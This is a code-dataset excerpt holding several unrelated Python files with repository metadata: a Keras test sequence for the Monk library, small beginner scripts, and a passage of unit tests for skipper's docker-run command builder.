|
4ee4d9483e8ffac9b73a41f3c378e5abf5fc799b
|
[
"Apache-2.0"
] | 7
|
2020-07-26T08:37:29.000Z
|
2020-10-30T10:23:11.000Z
|
monk/system_check_tests/keras/test_update_copy_from.py
|
mursalfk/monk_v1
|
62f34a52f242772186ffff7e56764e958fbcd920
|
[
"Apache-2.0"
] | 9
|
2020-01-28T21:40:39.000Z
|
2022-02-10T01:24:06.000Z
|
monk/system_check_tests/keras/test_update_copy_from.py
|
mursalfk/monk_v1
|
62f34a52f242772186ffff7e56764e958fbcd920
|
[
"Apache-2.0"
] | 1
|
2020-10-07T12:57:44.000Z
|
2020-10-07T12:57:44.000Z
|
import os
import sys
sys.path.append("../../../monk/");
import psutil
from keras_prototype import prototype
from compare_prototype import compare
from common import print_start
from common import print_status
def test_update_copy_from(system_dict):
forward = True;
test = "update_copy_from_object_creation";
system_dict["total_tests"] += 1;
print_start(test, system_dict["total_tests"])
if(forward):
try:
ktf = prototype(verbose=0);
system_dict["successful_tests"] += 1;
print_status("Pass");
except Exception as e:
system_dict["failed_tests_exceptions"].append(e);
system_dict["failed_tests_lists"].append(test);
forward = False;
print_status("Fail");
else:
system_dict["skipped_tests_lists"].append(test);
print_status("Skipped");
test = "update_copy_from_Prototype()";
system_dict["total_tests"] += 1;
print_start(test, system_dict["total_tests"])
if(forward):
try:
ktf.Prototype("sample-project-1", "sample-experiment-2", copy_from=["sample-project-1", "sample-experiment-1"]);
system_dict["successful_tests"] += 1;
print_status("Pass");
except Exception as e:
system_dict["failed_tests_exceptions"].append(e);
system_dict["failed_tests_lists"].append(test);
forward = False;
print_status("Fail");
else:
system_dict["skipped_tests_lists"].append(test);
print_status("Skipped");
test = "update_copy_from_reset_transforms()";
system_dict["total_tests"] += 1;
print_start(test, system_dict["total_tests"])
if(forward):
try:
ktf.reset_transforms();
system_dict["successful_tests"] += 1;
print_status("Pass");
except Exception as e:
system_dict["failed_tests_exceptions"].append(e);
system_dict["failed_tests_lists"].append(test);
forward = False;
print_status("Fail");
else:
system_dict["skipped_tests_lists"].append(test);
print_status("Skipped");
test = "update_copy_from_apply_transforms()";
system_dict["total_tests"] += 1;
print_start(test, system_dict["total_tests"])
if(forward):
try:
ktf.apply_random_horizontal_flip(train=True, val=True);
ktf.apply_mean_subtraction(mean=[0.485, 0.456, 0.406], train=True, val=True, test=True);
system_dict["successful_tests"] += 1;
print_status("Pass");
except Exception as e:
system_dict["failed_tests_exceptions"].append(e);
system_dict["failed_tests_lists"].append(test);
forward = False;
print_status("Fail");
else:
system_dict["skipped_tests_lists"].append(test);
print_status("Skipped");
test = "update_copy_from_update_dataset()";
system_dict["total_tests"] += 1;
print_start(test, system_dict["total_tests"])
if(forward):
try:
ktf.update_dataset(dataset_path=["../datasets/dataset_cats_dogs_train", "../datasets/dataset_cats_dogs_eval"]);
system_dict["successful_tests"] += 1;
print_status("Pass");
except Exception as e:
system_dict["failed_tests_exceptions"].append(e);
system_dict["failed_tests_lists"].append(test);
forward = False;
print_status("Fail");
else:
system_dict["skipped_tests_lists"].append(test);
print_status("Skipped");
test = "update_copy_from_update_input_size()";
system_dict["total_tests"] += 1;
print_start(test, system_dict["total_tests"])
if(forward):
try:
ktf.update_input_size(224);
system_dict["successful_tests"] += 1;
print_status("Pass");
except Exception as e:
system_dict["failed_tests_exceptions"].append(e);
system_dict["failed_tests_lists"].append(test);
forward = False;
print_status("Fail");
else:
system_dict["skipped_tests_lists"].append(test);
print_status("Skipped");
test = "update_copy_from_update_batch_size()";
system_dict["total_tests"] += 1;
print_start(test, system_dict["total_tests"])
if(forward):
try:
ktf.update_batch_size(6);
system_dict["successful_tests"] += 1;
print_status("Pass");
except Exception as e:
system_dict["failed_tests_exceptions"].append(e);
system_dict["failed_tests_lists"].append(test);
forward = False;
print_status("Fail");
else:
system_dict["skipped_tests_lists"].append(test);
print_status("Skipped");
test = "update_copy_from_update_shuffle_data()";
system_dict["total_tests"] += 1;
print_start(test, system_dict["total_tests"])
if(forward):
try:
ktf.update_shuffle_data(False);
system_dict["successful_tests"] += 1;
print_status("Pass");
except Exception as e:
system_dict["failed_tests_exceptions"].append(e);
system_dict["failed_tests_lists"].append(test);
forward = False;
print_status("Fail");
else:
system_dict["skipped_tests_lists"].append(test);
print_status("Skipped");
test = "update_copy_from_update_num_processors()";
system_dict["total_tests"] += 1;
print_start(test, system_dict["total_tests"])
if(forward):
try:
ktf.update_num_processors(16);
system_dict["successful_tests"] += 1;
print_status("Pass");
except Exception as e:
system_dict["failed_tests_exceptions"].append(e);
system_dict["failed_tests_lists"].append(test);
forward = False;
print_status("Fail");
else:
system_dict["skipped_tests_lists"].append(test);
print_status("Skipped");
test = "update_copy_from_update_trainval_split()";
system_dict["total_tests"] += 1;
print_start(test, system_dict["total_tests"])
if(forward):
try:
ktf.update_trainval_split(0.6);
system_dict["successful_tests"] += 1;
print_status("Pass");
except Exception as e:
system_dict["failed_tests_exceptions"].append(e);
system_dict["failed_tests_lists"].append(test);
forward = False;
print_status("Fail");
else:
system_dict["skipped_tests_lists"].append(test);
print_status("Skipped");
test = "update_copy_from_Reload()";
system_dict["total_tests"] += 1;
print_start(test, system_dict["total_tests"])
if(forward):
try:
ktf.Reload();
system_dict["successful_tests"] += 1;
print_status("Pass");
except Exception as e:
system_dict["failed_tests_exceptions"].append(e);
system_dict["failed_tests_lists"].append(test);
forward = False;
print_status("Fail");
else:
system_dict["skipped_tests_lists"].append(test);
print_status("Skipped");
test = "update_copy_from_EDA()";
system_dict["total_tests"] += 1;
print_start(test, system_dict["total_tests"])
if(forward):
try:
ktf.EDA(check_missing=True, check_corrupt=True);
system_dict["successful_tests"] += 1;
print_status("Pass");
except Exception as e:
system_dict["failed_tests_exceptions"].append(e);
system_dict["failed_tests_lists"].append(test);
forward = False;
print_status("Fail");
else:
system_dict["skipped_tests_lists"].append(test);
print_status("Skipped");
test = "update_copy_from_Train()";
system_dict["total_tests"] += 1;
print_start(test, system_dict["total_tests"])
if(forward):
try:
ktf.Train();
system_dict["successful_tests"] += 1;
print_status("Pass");
except Exception as e:
system_dict["failed_tests_exceptions"].append(e);
system_dict["failed_tests_lists"].append(test);
forward = False;
print_status("Fail");
else:
system_dict["skipped_tests_lists"].append(test);
print_status("Skipped");
return system_dict
| 33.132813
| 124
| 0.607522
| 964
| 8,482
| 4.996888
| 0.089212
| 0.166078
| 0.080963
| 0.107951
| 0.863816
| 0.85136
| 0.85136
| 0.85136
| 0.85136
| 0.85136
| 0
| 0.008159
| 0.263028
| 8,482
| 256
| 125
| 33.132813
| 0.762438
| 0
| 0
| 0.827273
| 0
| 0
| 0.241188
| 0.093363
| 0
| 0
| 0
| 0
| 0
| 1
| 0.004545
| false
| 0.059091
| 0.031818
| 0
| 0.040909
| 0.245455
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
|
0
| 8
|
89f0ef1e1dc97e4d624e4484840bd5d830d1d158
| 284
|
py
|
Python
|
exercises/exe01 - 10/exe007.py
|
thomas-rohde/Classes-Python
|
f862995510b7aabf68bc14aecf815f597034d8a1
|
[
"MIT"
] | null | null | null |
exercises/exe01 - 10/exe007.py
|
thomas-rohde/Classes-Python
|
f862995510b7aabf68bc14aecf815f597034d8a1
|
[
"MIT"
] | null | null | null |
exercises/exe01 - 10/exe007.py
|
thomas-rohde/Classes-Python
|
f862995510b7aabf68bc14aecf815f597034d8a1
|
[
"MIT"
] | null | null | null |
n = int(input('Selecione um n°: '))
print('A tabuada de {} é:\n---------------------\n->1-({}) ->2-({})\n->3-({}) ->4-({})\n-------------\n->5-({}) ->6-({})\n-------------\n->7-({}) ->8-({})\n-------------\n->9-({}) ->10-({})'.format(n, n*2, n*3, n*4, n*5, n*6, n*7, n*8, n*9, n*10))
| 94.666667
| 247
| 0.292254
| 51
| 284
| 1.647059
| 0.431373
| 0.119048
| 0.071429
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.081081
| 0.088028
| 284
| 3
| 247
| 94.666667
| 0.239382
| 0
| 0
| 0
| 0
| 0.5
| 0.698246
| 0.470175
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0
| 0
| 0
| 0
| 0.5
| 0
| 0
| 1
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 1
| 1
| 1
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
|
0
| 7
|
d62cf131370f0524627cb5b5acf1e3867dcc294d
| 67
|
py
|
Python
|
python-jokes.py
|
aditya270520/python-jokes
|
c51dcd8feb9cee6043bc6b9f299dce562e76c274
|
[
"MIT"
] | null | null | null |
python-jokes.py
|
aditya270520/python-jokes
|
c51dcd8feb9cee6043bc6b9f299dce562e76c274
|
[
"MIT"
] | null | null | null |
python-jokes.py
|
aditya270520/python-jokes
|
c51dcd8feb9cee6043bc6b9f299dce562e76c274
|
[
"MIT"
] | null | null | null |
import pyjokes
print(pyjokes.get_joke())
print(pyjokes.get_jokes())
| 22.333333
| 26
| 0.80597
| 10
| 67
| 5.2
| 0.6
| 0.461538
| 0.576923
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.044776
| 67
| 3
| 26
| 22.333333
| 0.8125
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 0.333333
| 0
| 0.333333
| 0.666667
| 1
| 0
| 0
| null | 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 0
| 1
|
0
| 7
|
7f05dd21f4ae15e8bc51988fac7596b7e9e25de9
| 83
|
py
|
Python
|
opencoverage/api/__init__.py
|
pavelito/opencoverage
|
ee2820dc1c5261263e8be1f041ce915e54248905
|
[
"MIT"
] | 25
|
2021-01-20T17:38:03.000Z
|
2021-12-13T22:23:22.000Z
|
opencoverage/api/__init__.py
|
pavelito/opencoverage
|
ee2820dc1c5261263e8be1f041ce915e54248905
|
[
"MIT"
] | 16
|
2021-01-23T17:51:19.000Z
|
2021-03-21T11:25:05.000Z
|
opencoverage/api/__init__.py
|
pavelito/opencoverage
|
ee2820dc1c5261263e8be1f041ce915e54248905
|
[
"MIT"
] | 6
|
2021-01-22T12:47:05.000Z
|
2022-01-27T09:49:53.000Z
|
from . import api # noqa
from . import badge # noqa
from . import upload # noqa
| 20.75
| 28
| 0.674699
| 12
| 83
| 4.666667
| 0.5
| 0.535714
| 0.5
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.253012
| 83
| 3
| 29
| 27.666667
| 0.903226
| 0.168675
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 1
| 0
| 0
| null | 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 7
|
617609fea285bd5b60498bae0ddca56f48ae63f8
| 27,156
|
py
|
Python
|
tests/test_runner.py
|
omertuc/skipper
|
d2e47cee6491d817e9235593564ae3fff334ec4c
|
[
"Apache-2.0"
] | null | null | null |
tests/test_runner.py
|
omertuc/skipper
|
d2e47cee6491d817e9235593564ae3fff334ec4c
|
[
"Apache-2.0"
] | null | null | null |
tests/test_runner.py
|
omertuc/skipper
|
d2e47cee6491d817e9235593564ae3fff334ec4c
|
[
"Apache-2.0"
] | null | null | null |
import sys
import os
import unittest
import mock
from skipper import utils
from skipper import runner
from skipper.runner import get_default_net
USER_ID = 1000
GROUP_ID = 2000
REGISTRY = 'registry.io:5000'
IMAGE = 'image'
TAG = '1234567'
FQDN_IMAGE = REGISTRY + '/' + IMAGE + ':' + TAG
WORKDIR = '/home/adir/work'
HOME_DIR = '/home/adir'
PROJECT = 'proj'
PROJECT_DIR = os.path.join(WORKDIR, PROJECT)
ENV = ["KEY1=VAL1", "KEY2=VAL2"]
ENV_FILE_PATH = '/home/envfile.env'
ENV_FILES = [ENV_FILE_PATH, ENV_FILE_PATH]
def get_volume_mapping(volume_mapping):
if sys.platform == 'darwin':
if volume_mapping.startswith('/etc/') or volume_mapping.startswith('/var/lib/'):
return '/private' + volume_mapping
return volume_mapping
class TestRunner(unittest.TestCase):
NET_LS = 'NETWORK ID NAME DRIVER SCOPE\n' \
'8c954c27cf41 host host local\n'
NET_NOT_EXISTS = 'NETWORK ID NAME DRIVER SCOPE\n'
def setUp(self):
self.runtime = "docker"
utils.CONTAINER_RUNTIME_COMMAND = self.runtime
os.environ['KEEP_CONTAINERS'] = 'True'
@mock.patch('subprocess.Popen', autospec=False)
def test_run_simple_command_not_nested(self, popen_mock):
popen_mock.return_value.stdout.readline.side_effect = ['aaa', 'bbb', 'ccc', '']
popen_mock.return_value.poll.return_value = -1
command = ['pwd']
runner.run(command)
popen_mock.assert_called_once_with([self.runtime] + command)
@mock.patch('subprocess.Popen', autospec=False)
def test_run_complex_command_not_nested(self, popen_mock):
popen_mock.return_value.stdout.readline.side_effect = ['aaa', 'bbb', 'ccc', '']
popen_mock.return_value.poll.return_value = -1
command = ['ls -l']
runner.run(command)
popen_mock.assert_called_once_with([self.runtime] + command)
@mock.patch('os.path.exists', mock.MagicMock(autospec=True, return_value=True))
@mock.patch('getpass.getuser', mock.MagicMock(autospec=True, return_value='testuser'))
@mock.patch('os.getcwd', mock.MagicMock(autospec=True, return_value=PROJECT_DIR))
@mock.patch('os.path.expanduser', mock.MagicMock(autospec=True, return_value=HOME_DIR))
@mock.patch('os.getuid', autospec=True)
@mock.patch('grp.getgrnam', autospec=True)
@mock.patch('subprocess.Popen', autospec=False)
@mock.patch('subprocess.check_output', autospec=False)
@mock.patch('pkg_resources.resource_filename', autospec=False)
def test_run_simple_command_nested_network_exist(self, resource_filename_mock, check_output_mock,
popen_mock, grp_getgrnam_mock, os_getuid_mock):
resource_filename_mock.return_value = "entrypoint.sh"
check_output_mock.side_effect = [self.NET_LS, '']
popen_mock.return_value.stdout.readline.side_effect = ['aaa', 'bbb', 'ccc', '']
popen_mock.return_value.poll.return_value = -1
grp_getgrnam_mock.return_value.gr_gid = 978
os_getuid_mock.return_value = USER_ID
command = ['pwd']
runner.run(command, FQDN_IMAGE)
expected_nested_command = [
'docker', 'run',
'-t',
'-e', 'KEEP_CONTAINERS=True',
'--privileged',
'--net', get_default_net(),
'-e', 'SKIPPER_USERNAME=testuser',
'-e', 'SKIPPER_UID=%(user_uid)s' % dict(user_uid=USER_ID),
'-e', 'HOME=%(homedir)s' % dict(homedir=HOME_DIR),
'-e', 'SKIPPER_DOCKER_GID=978',
'-v', get_volume_mapping('%(homedir)s/.netrc:%(homedir)s/.netrc:ro' % dict(homedir=HOME_DIR)),
'-v', get_volume_mapping('%(homedir)s/.gitconfig:%(homedir)s/.gitconfig:ro' % dict(homedir=HOME_DIR)),
'-v', get_volume_mapping('%(homedir)s/.docker/config.json:%(homedir)s/.docker/config.json:ro' % dict(homedir=HOME_DIR)),
'-v', get_volume_mapping('/etc/docker:/etc/docker:ro'),
'-v', get_volume_mapping('%(workdir)s:%(workdir)s:rw' % dict(workdir=WORKDIR)),
'-v', get_volume_mapping('/var/run/docker.sock:/var/run/docker.sock:rw'),
'-v', get_volume_mapping('entrypoint.sh:/opt/skipper/skipper-entrypoint.sh'),
'-v', get_volume_mapping('/var/lib/osmosis:/var/lib/osmosis:rw'),
'-w', PROJECT_DIR,
'--entrypoint', '/opt/skipper/skipper-entrypoint.sh',
FQDN_IMAGE,
command[0]
]
popen_mock.assert_called_once_with(expected_nested_command)
@mock.patch('os.path.exists', mock.MagicMock(autospec=True, return_value=True))
@mock.patch('getpass.getuser', mock.MagicMock(autospec=True, return_value='testuser'))
@mock.patch('os.getcwd', mock.MagicMock(autospec=True, return_value=PROJECT_DIR))
@mock.patch('os.path.expanduser', mock.MagicMock(autospec=True, return_value=HOME_DIR))
@mock.patch('os.getuid', autospec=True)
@mock.patch('grp.getgrnam', autospec=True)
@mock.patch('subprocess.Popen', autospec=False)
@mock.patch('subprocess.check_output', autospec=False)
@mock.patch('pkg_resources.resource_filename', autospec=False)
def test_run_simple_command_nested_network_not_exist(self, resource_filename_mock,
check_output_mock, popen_mock, grp_getgrnam_mock, os_getuid_mock):
resource_filename_mock.return_value = "entrypoint.sh"
check_output_mock.side_effect = [self.NET_NOT_EXISTS, 'new-net-hash', '']
popen_mock.return_value.stdout.readline.side_effect = ['aaa', 'bbb', 'ccc', '']
popen_mock.return_value.poll.return_value = -1
grp_getgrnam_mock.return_value.gr_gid = 978
os_getuid_mock.return_value = USER_ID
command = ['pwd']
runner.run(command, FQDN_IMAGE)
expected_nested_command = [
'docker', 'run',
'-t',
'-e', 'KEEP_CONTAINERS=True',
'--privileged',
'--net', get_default_net(),
'-e', 'SKIPPER_USERNAME=testuser',
'-e', 'SKIPPER_UID=%(user_uid)s' % dict(user_uid=USER_ID),
'-e', 'HOME=%(homedir)s' % dict(homedir=HOME_DIR),
'-e', 'SKIPPER_DOCKER_GID=978',
'-v', get_volume_mapping('%(homedir)s/.netrc:%(homedir)s/.netrc:ro' % dict(homedir=HOME_DIR)),
'-v', get_volume_mapping('%(homedir)s/.gitconfig:%(homedir)s/.gitconfig:ro' % dict(homedir=HOME_DIR)),
'-v', get_volume_mapping('%(homedir)s/.docker/config.json:%(homedir)s/.docker/config.json:ro' % dict(homedir=HOME_DIR)),
'-v', get_volume_mapping('/etc/docker:/etc/docker:ro'),
'-v', get_volume_mapping('%(workdir)s:%(workdir)s:rw' % dict(workdir=WORKDIR)),
'-v', get_volume_mapping('/var/run/docker.sock:/var/run/docker.sock:rw'),
'-v', get_volume_mapping('entrypoint.sh:/opt/skipper/skipper-entrypoint.sh'),
'-v', get_volume_mapping('/var/lib/osmosis:/var/lib/osmosis:rw'),
'-w', PROJECT_DIR,
'--entrypoint', '/opt/skipper/skipper-entrypoint.sh',
FQDN_IMAGE,
command[0]
]
popen_mock.assert_called_once_with(expected_nested_command)
@mock.patch('os.path.exists', mock.MagicMock(autospec=True, return_value=True))
@mock.patch('getpass.getuser', mock.MagicMock(autospec=True, return_value='testuser'))
@mock.patch('os.getcwd', mock.MagicMock(autospec=True, return_value=PROJECT_DIR))
@mock.patch('os.path.expanduser', mock.MagicMock(autospec=True, return_value=HOME_DIR))
@mock.patch('os.getuid', autospec=True)
@mock.patch('grp.getgrnam', autospec=True)
@mock.patch('subprocess.Popen', autospec=False)
@mock.patch('subprocess.check_output', autospec=False)
@mock.patch('pkg_resources.resource_filename', autospec=False)
def test_run_simple_command_nested_with_env(self, resource_filename_mock, check_output_mock, popen_mock, grp_getgrnam_mock, os_getuid_mock):
resource_filename_mock.return_value = "entrypoint.sh"
check_output_mock.side_effect = [self.NET_LS, '']
popen_mock.return_value.stdout.readline.side_effect = ['aaa', 'bbb', 'ccc', '']
popen_mock.return_value.poll.return_value = -1
grp_getgrnam_mock.return_value.gr_gid = 978
os_getuid_mock.return_value = USER_ID
command = ['pwd']
runner.run(command, FQDN_IMAGE, ENV)
expected_docker_command = [
'docker', 'run',
'-t',
'-e', 'KEEP_CONTAINERS=True',
'--privileged',
'--net', get_default_net(),
'-e', 'KEY1=VAL1',
'-e', 'KEY2=VAL2',
'-e', 'SKIPPER_USERNAME=testuser',
'-e', 'SKIPPER_UID=%(user_uid)s' % dict(user_uid=USER_ID),
'-e', 'HOME=%(homedir)s' % dict(homedir=HOME_DIR),
'-e', 'SKIPPER_DOCKER_GID=978',
'-v', get_volume_mapping('%(homedir)s/.netrc:%(homedir)s/.netrc:ro' % dict(homedir=HOME_DIR)),
'-v', get_volume_mapping('%(homedir)s/.gitconfig:%(homedir)s/.gitconfig:ro' % dict(homedir=HOME_DIR)),
'-v', get_volume_mapping('%(homedir)s/.docker/config.json:%(homedir)s/.docker/config.json:ro' % dict(homedir=HOME_DIR)),
'-v', get_volume_mapping('/etc/docker:/etc/docker:ro'),
'-v', get_volume_mapping('%(workdir)s:%(workdir)s:rw' % dict(workdir=WORKDIR)),
'-v', get_volume_mapping('/var/run/docker.sock:/var/run/docker.sock:rw'),
'-v', get_volume_mapping('entrypoint.sh:/opt/skipper/skipper-entrypoint.sh'),
'-v', get_volume_mapping('/var/lib/osmosis:/var/lib/osmosis:rw'),
'-w', PROJECT_DIR,
'--entrypoint', '/opt/skipper/skipper-entrypoint.sh',
FQDN_IMAGE,
command[0]
]
popen_mock.assert_called_once_with(expected_docker_command)
@mock.patch('os.path.exists',
mock.MagicMock(autospec=True, return_value=True))
@mock.patch('getpass.getuser',
mock.MagicMock(autospec=True, return_value='testuser'))
@mock.patch('os.getcwd',
mock.MagicMock(autospec=True, return_value=PROJECT_DIR))
@mock.patch('os.path.expanduser',
mock.MagicMock(autospec=True, return_value=HOME_DIR))
@mock.patch('os.getuid', autospec=True)
@mock.patch('grp.getgrnam', autospec=True)
@mock.patch('subprocess.Popen', autospec=False)
@mock.patch('subprocess.check_output', autospec=False)
@mock.patch('pkg_resources.resource_filename', autospec=False)
def test_run_simple_command_nested_with_env_file(
self, resource_filename_mock, check_output_mock, popen_mock,
grp_getgrnam_mock, os_getuid_mock
):
resource_filename_mock.return_value = "entrypoint.sh"
check_output_mock.side_effect = [self.NET_LS, '']
popen_mock.return_value.stdout.readline.side_effect = ['aaa', 'bbb',
'ccc', '']
popen_mock.return_value.poll.return_value = -1
grp_getgrnam_mock.return_value.gr_gid = 978
os_getuid_mock.return_value = USER_ID
command = ['pwd']
runner.run(command, FQDN_IMAGE, env_file=[ENV_FILE_PATH])
expected_docker_command = [
'docker', 'run',
'-t',
'-e', 'KEEP_CONTAINERS=True',
'--privileged',
'--net', get_default_net(),
'--env-file', ENV_FILE_PATH,
'-e', 'SKIPPER_USERNAME=testuser',
'-e', 'SKIPPER_UID=%(user_uid)s' % dict(user_uid=USER_ID),
'-e', 'HOME=%(homedir)s' % dict(homedir=HOME_DIR),
'-e', 'SKIPPER_DOCKER_GID=978',
'-v', get_volume_mapping('%(homedir)s/.netrc:%(homedir)s/.netrc:ro' % dict(
homedir=HOME_DIR)),
'-v', get_volume_mapping('%(homedir)s/.gitconfig:%(homedir)s/.gitconfig:ro' % dict(
homedir=HOME_DIR)),
'-v', get_volume_mapping('%(homedir)s/.docker/config.json:%(homedir)s/.docker/config.json:ro' % dict(
homedir=HOME_DIR)),
'-v', get_volume_mapping('/etc/docker:/etc/docker:ro'),
'-v', get_volume_mapping('%(workdir)s:%(workdir)s:rw' % dict(workdir=WORKDIR)),
'-v', get_volume_mapping('/var/run/docker.sock:/var/run/docker.sock:rw'),
'-v', get_volume_mapping('entrypoint.sh:/opt/skipper/skipper-entrypoint.sh'),
'-v', get_volume_mapping('/var/lib/osmosis:/var/lib/osmosis:rw'),
'-w', PROJECT_DIR,
'--entrypoint', '/opt/skipper/skipper-entrypoint.sh',
FQDN_IMAGE,
command[0]
]
popen_mock.assert_called_once_with(expected_docker_command)
@mock.patch('os.path.exists',
mock.MagicMock(autospec=True, return_value=True))
@mock.patch('getpass.getuser',
mock.MagicMock(autospec=True, return_value='testuser'))
@mock.patch('os.getcwd',
mock.MagicMock(autospec=True, return_value=PROJECT_DIR))
@mock.patch('os.path.expanduser',
mock.MagicMock(autospec=True, return_value=HOME_DIR))
@mock.patch('os.getuid', autospec=True)
@mock.patch('grp.getgrnam', autospec=True)
@mock.patch('subprocess.Popen', autospec=False)
@mock.patch('subprocess.check_output', autospec=False)
@mock.patch('pkg_resources.resource_filename', autospec=False)
def test_run_simple_command_nested_with_multiple_env_files(
self, resource_filename_mock, check_output_mock, popen_mock,
grp_getgrnam_mock, os_getuid_mock
):
resource_filename_mock.return_value = "entrypoint.sh"
check_output_mock.side_effect = [self.NET_LS, '']
popen_mock.return_value.stdout.readline.side_effect = ['aaa', 'bbb',
'ccc', '']
popen_mock.return_value.poll.return_value = -1
grp_getgrnam_mock.return_value.gr_gid = 978
os_getuid_mock.return_value = USER_ID
command = ['pwd']
runner.run(command, FQDN_IMAGE, env_file=ENV_FILES)
expected_docker_command = [
'docker', 'run',
'-t',
'-e', 'KEEP_CONTAINERS=True',
'--privileged',
'--net', 'host',
'--env-file', ENV_FILE_PATH,
'--env-file', ENV_FILE_PATH,
'-e', 'SKIPPER_USERNAME=testuser',
'-e', 'SKIPPER_UID=%(user_uid)s' % dict(user_uid=USER_ID),
'-e', 'HOME=%(homedir)s' % dict(homedir=HOME_DIR),
'-e', 'SKIPPER_DOCKER_GID=978',
'-v', '%(homedir)s/.netrc:%(homedir)s/.netrc:ro' % dict(
homedir=HOME_DIR),
'-v', '%(homedir)s/.gitconfig:%(homedir)s/.gitconfig:ro' % dict(
homedir=HOME_DIR),
'-v',
'%(homedir)s/.docker/config.json:%(homedir)s/.docker/config.json:ro' % dict(
homedir=HOME_DIR),
'-v', '/etc/docker:/etc/docker:ro',
'-v', '%(workdir)s:%(workdir)s:rw' % dict(workdir=WORKDIR),
'-v', '/var/run/docker.sock:/var/run/docker.sock:rw',
'-v', 'entrypoint.sh:/opt/skipper/skipper-entrypoint.sh',
'-v', '/var/lib/osmosis:/var/lib/osmosis:rw',
'-w', PROJECT_DIR,
'--entrypoint', '/opt/skipper/skipper-entrypoint.sh',
FQDN_IMAGE,
command[0]
]
popen_mock.assert_called_once_with(expected_docker_command)
@mock.patch('os.path.exists', mock.MagicMock(autospec=True, return_value=True))
@mock.patch('getpass.getuser', mock.MagicMock(autospec=True, return_value='testuser'))
@mock.patch('os.getcwd', mock.MagicMock(autospec=True, return_value=PROJECT_DIR))
@mock.patch('os.path.expanduser', mock.MagicMock(autospec=True, return_value=HOME_DIR))
@mock.patch('os.getuid', autospec=True)
@mock.patch('grp.getgrnam', autospec=True)
@mock.patch('subprocess.Popen', autospec=False)
@mock.patch('subprocess.check_output', autospec=False)
@mock.patch('pkg_resources.resource_filename', autospec=False)
def test_run_simple_command_nested_interactive(self, resource_filename_mock,
check_output_mock, popen_mock, grp_getgrnam_mock, os_getuid_mock):
resource_filename_mock.return_value = "entrypoint.sh"
check_output_mock.side_effect = [self.NET_LS, '']
popen_mock.return_value.stdout.readline.side_effect = ['aaa', 'bbb', 'ccc', '']
popen_mock.return_value.poll.return_value = -1
grp_getgrnam_mock.return_value.gr_gid = 978
os_getuid_mock.return_value = USER_ID
command = ['pwd']
runner.run(command, FQDN_IMAGE, interactive=True)
expected_nested_command = [
'docker', 'run',
'-i',
'-e', 'SKIPPER_INTERACTIVE=True',
'-t',
'-e', 'KEEP_CONTAINERS=True',
'--privileged',
'--net', get_default_net(),
'-e', 'SKIPPER_USERNAME=testuser',
'-e', 'SKIPPER_UID=%(user_uid)s' % dict(user_uid=USER_ID),
'-e', 'HOME=%(homedir)s' % dict(homedir=HOME_DIR),
'-e', 'SKIPPER_DOCKER_GID=978',
'-v', get_volume_mapping('%(homedir)s/.netrc:%(homedir)s/.netrc:ro' % dict(homedir=HOME_DIR)),
'-v', get_volume_mapping('%(homedir)s/.gitconfig:%(homedir)s/.gitconfig:ro' % dict(homedir=HOME_DIR)),
'-v', get_volume_mapping('%(homedir)s/.docker/config.json:%(homedir)s/.docker/config.json:ro' % dict(homedir=HOME_DIR)),
'-v', get_volume_mapping('/etc/docker:/etc/docker:ro'),
'-v', get_volume_mapping('%(workdir)s:%(workdir)s:rw' % dict(workdir=WORKDIR)),
'-v', get_volume_mapping('/var/run/docker.sock:/var/run/docker.sock:rw'),
'-v', get_volume_mapping('entrypoint.sh:/opt/skipper/skipper-entrypoint.sh'),
'-v', get_volume_mapping('/var/lib/osmosis:/var/lib/osmosis:rw'),
'-w', PROJECT_DIR,
'--entrypoint', '/opt/skipper/skipper-entrypoint.sh',
FQDN_IMAGE,
command[0]
]
popen_mock.assert_called_once_with(expected_nested_command)
@mock.patch('os.path.exists', mock.MagicMock(autospec=True, return_value=True))
@mock.patch('getpass.getuser', mock.MagicMock(autospec=True, return_value='testuser'))
@mock.patch('os.getcwd', mock.MagicMock(autospec=True, return_value=PROJECT_DIR))
@mock.patch('os.path.expanduser', mock.MagicMock(autospec=True, return_value=HOME_DIR))
@mock.patch('os.getuid', autospec=True)
@mock.patch('grp.getgrnam', autospec=True,)
@mock.patch('subprocess.Popen', autospec=False)
@mock.patch('subprocess.check_output', autospec=False)
@mock.patch('pkg_resources.resource_filename', autospec=False)
def test_run_complex_command_nested(self, resource_filename_mock, check_output_mock, popen_mock, grp_getgrnam_mock, os_getuid_mock):
resource_filename_mock.return_value = "entrypoint.sh"
check_output_mock.side_effect = [self.NET_LS, '']
popen_mock.return_value.stdout.readline.side_effect = ['aaa', 'bbb', 'ccc', '']
popen_mock.return_value.poll.return_value = -1
grp_getgrnam_mock.return_value.gr_gid = 978
os_getuid_mock.return_value = USER_ID
command = ['ls', '-l']
runner.run(command, FQDN_IMAGE)
expected_nested_command = [
'docker', 'run',
'-t',
'-e', 'KEEP_CONTAINERS=True',
'--privileged',
'--net', get_default_net(),
'-e', 'SKIPPER_USERNAME=testuser',
